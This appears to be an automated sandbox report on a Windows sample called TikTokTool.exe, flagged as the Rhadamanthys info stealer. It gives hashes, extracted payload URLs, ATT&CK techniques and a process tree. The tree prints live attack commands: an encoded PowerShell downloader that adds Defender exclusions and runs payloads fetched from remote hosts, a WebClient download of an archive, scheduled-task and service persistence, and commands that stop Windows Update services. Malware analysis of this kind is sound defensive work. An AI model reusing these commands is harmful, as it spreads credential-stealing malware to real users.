Analysis
-
max time kernel
39s -
max time network
42s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 14:22
Static task
static1
Behavioral task
behavioral1
Sample
TikTokTool.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
TikTokTool.exe
Resource
win10v2004-20240611-en
General
-
Target
TikTokTool.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Extracted
https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
xaa22oqf.pc41.exedescription pid process target process PID 5776 created 3064 5776 xaa22oqf.pc41.exe sihost.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 2 2552 powershell.exe 4 2552 powershell.exe 24 4720 powershell.exe 25 1116 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2552 powershell.exe 1116 powershell.exe 4720 powershell.exe 5800 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
TikTokTool.exexaa22oqf.pc40.exexaa22oqf.pc43.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation TikTokTool.exe Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation xaa22oqf.pc40.exe Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation xaa22oqf.pc43.exe -
Executes dropped EXE 4 IoCs
Processes:
xaa22oqf.pc40.exexaa22oqf.pc41.exexaa22oqf.pc42.exexaa22oqf.pc43.exepid process 5748 xaa22oqf.pc40.exe 5776 xaa22oqf.pc41.exe 552 xaa22oqf.pc42.exe 2524 xaa22oqf.pc43.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Drops file in System32 directory 4 IoCs
Processes:
xaa22oqf.pc42.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe xaa22oqf.pc42.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
xaa22oqf.pc42.exedescription pid process target process PID 552 set thread context of 2832 552 xaa22oqf.pc42.exe dialer.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4780 sc.exe 4484 sc.exe 2968 sc.exe 4596 sc.exe 2196 sc.exe 336 sc.exe 2652 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
Processes:
powershell.exepowershell.exepowershell.exexaa22oqf.pc41.exedialer.exexaa22oqf.pc42.exepowershell.exedialer.exepid process 2552 powershell.exe 2552 powershell.exe 4720 powershell.exe 4720 powershell.exe 1116 powershell.exe 1116 powershell.exe 5776 xaa22oqf.pc41.exe 5776 xaa22oqf.pc41.exe 2380 dialer.exe 2380 dialer.exe 2380 dialer.exe 2380 dialer.exe 552 xaa22oqf.pc42.exe 5800 powershell.exe 5800 powershell.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 552 xaa22oqf.pc42.exe 2832 dialer.exe 2832 dialer.exe 552 xaa22oqf.pc42.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe 2832 dialer.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exexaa22oqf.pc42.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2552 powershell.exe Token: SeDebugPrivilege 4720 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 5800 powershell.exe Token: SeDebugPrivilege 552 xaa22oqf.pc42.exe Token: SeDebugPrivilege 2832 dialer.exe Token: SeShutdownPrivilege 1020 powercfg.exe Token: SeCreatePagefilePrivilege 1020 powercfg.exe Token: SeShutdownPrivilege 3008 powercfg.exe Token: SeCreatePagefilePrivilege 3008 powercfg.exe Token: SeShutdownPrivilege 4652 powercfg.exe Token: SeCreatePagefilePrivilege 4652 powercfg.exe Token: SeShutdownPrivilege 2404 powercfg.exe Token: SeCreatePagefilePrivilege 2404 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
TikTokTool.exepowershell.exexaa22oqf.pc40.exexaa22oqf.pc43.execmd.execmd.execmd.execmd.exexaa22oqf.pc41.execmd.exexaa22oqf.pc42.exedialer.exedescription pid process target process PID 4052 wrote to memory of 2552 4052 TikTokTool.exe powershell.exe PID 4052 wrote to memory of 2552 4052 TikTokTool.exe powershell.exe PID 2552 wrote to memory of 5748 2552 powershell.exe xaa22oqf.pc40.exe PID 2552 wrote to memory of 5748 2552 powershell.exe xaa22oqf.pc40.exe PID 2552 wrote to memory of 5748 2552 powershell.exe xaa22oqf.pc40.exe PID 2552 wrote to memory of 5776 2552 powershell.exe xaa22oqf.pc41.exe PID 2552 wrote to memory of 5776 2552 powershell.exe xaa22oqf.pc41.exe PID 2552 wrote to memory of 5776 2552 powershell.exe xaa22oqf.pc41.exe PID 2552 wrote to memory of 552 2552 powershell.exe xaa22oqf.pc42.exe PID 2552 wrote to memory of 552 2552 powershell.exe xaa22oqf.pc42.exe PID 2552 wrote to memory of 2524 2552 powershell.exe xaa22oqf.pc43.exe PID 2552 wrote to memory of 2524 2552 powershell.exe xaa22oqf.pc43.exe PID 2552 wrote to memory of 2524 2552 powershell.exe xaa22oqf.pc43.exe PID 5748 wrote to memory of 2312 5748 xaa22oqf.pc40.exe cmd.exe PID 5748 wrote to memory of 2312 5748 xaa22oqf.pc40.exe cmd.exe PID 2524 wrote to memory of 1564 2524 xaa22oqf.pc43.exe cmd.exe PID 2524 wrote to memory of 1564 2524 xaa22oqf.pc43.exe cmd.exe PID 2312 wrote to memory of 5604 2312 cmd.exe chcp.com PID 2312 wrote to memory of 5604 2312 cmd.exe chcp.com PID 1564 wrote to memory of 5952 1564 cmd.exe where.exe PID 1564 wrote to memory of 5952 1564 cmd.exe where.exe PID 2312 wrote to memory of 5656 2312 cmd.exe findstr.exe PID 2312 wrote to memory of 5656 2312 cmd.exe findstr.exe PID 2312 wrote to memory of 5668 2312 cmd.exe findstr.exe PID 2312 wrote to memory of 5668 2312 cmd.exe findstr.exe PID 1564 wrote to memory of 4720 1564 cmd.exe powershell.exe PID 1564 wrote to memory of 4720 1564 cmd.exe powershell.exe PID 2312 wrote to memory of 1784 2312 cmd.exe findstr.exe PID 2312 wrote to memory of 1784 2312 cmd.exe findstr.exe PID 2312 wrote to memory of 1620 2312 cmd.exe schtasks.exe PID 2312 wrote to memory of 1620 2312 cmd.exe schtasks.exe PID 2312 wrote to memory of 3764 2312 cmd.exe schtasks.exe PID 2312 wrote to memory of 3764 2312 cmd.exe schtasks.exe PID 2312 wrote to memory of 5472 2312 cmd.exe cmd.exe PID 2312 wrote to memory of 5472 2312 cmd.exe cmd.exe PID 5472 wrote to memory of 1292 5472 cmd.exe reg.exe PID 5472 wrote to memory of 1292 5472 cmd.exe reg.exe PID 2312 wrote to memory of 5448 2312 cmd.exe cmd.exe PID 2312 wrote to memory of 5448 2312 cmd.exe cmd.exe PID 5448 wrote to memory of 5356 5448 cmd.exe reg.exe PID 5448 wrote to memory of 5356 5448 cmd.exe reg.exe PID 2312 wrote to memory of 1116 2312 cmd.exe powershell.exe PID 2312 wrote to memory of 1116 2312 cmd.exe powershell.exe PID 5776 wrote to memory of 2380 5776 xaa22oqf.pc41.exe dialer.exe PID 5776 wrote to memory of 2380 5776 xaa22oqf.pc41.exe dialer.exe PID 5776 wrote to memory of 2380 5776 xaa22oqf.pc41.exe dialer.exe PID 5776 wrote to memory of 2380 5776 xaa22oqf.pc41.exe dialer.exe PID 5776 wrote to memory of 2380 5776 xaa22oqf.pc41.exe dialer.exe PID 832 wrote to memory of 2724 832 cmd.exe wusa.exe PID 832 wrote to memory of 2724 832 cmd.exe wusa.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 552 wrote to memory of 2832 552 xaa22oqf.pc42.exe dialer.exe PID 2832 wrote to memory of 616 2832 dialer.exe winlogon.exe PID 2832 wrote to memory of 664 2832 dialer.exe lsass.exe PID 2832 wrote to memory of 952 2832 dialer.exe svchost.exe PID 2832 wrote to memory of 380 2832 dialer.exe dwm.exe PID 2832 wrote to memory of 744 2832 dialer.exe svchost.exe PID 2832 wrote to memory of 1048 2832 dialer.exe svchost.exe PID 2832 wrote to memory of 1076 2832 dialer.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe"C:\Users\Admin\AppData\Local\Temp\TikTokTool.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc40.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\chcp.comchcp 12516⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc41.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc42.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\52C3.tmp\52C4.tmp\52C5.bat C:\Users\Admin\AppData\Roaming\xaa22oqf.pc43.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
2Service Execution
2Scheduled Task/Job
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD595e1c8db6eb5be60fa7c5f7ca36bfaed
SHA15b23544fe29ddd6f07852b4ff8971a5bf6c0fdf9
SHA2563b3202f973ef9c0f477b91a022fd535a21e8b444279d8be34fcd16fccfe68a18
SHA512de221bd9c8728434d7a463d7bc5123c5bc45362224b8e312abef60e2e89197cd9b77839df07069d663a483233d3395e9cd8b414d68c3b857eb9171d6d8a195db
-
C:\Users\Admin\AppData\Local\Temp\51C9.tmp\51CA.tmp\51CB.batFilesize
6KB
MD545f6bf2d3c1c47e445439b805929aae8
SHA19d2ba518dd058559bc1d690019bbed79c7cd5f85
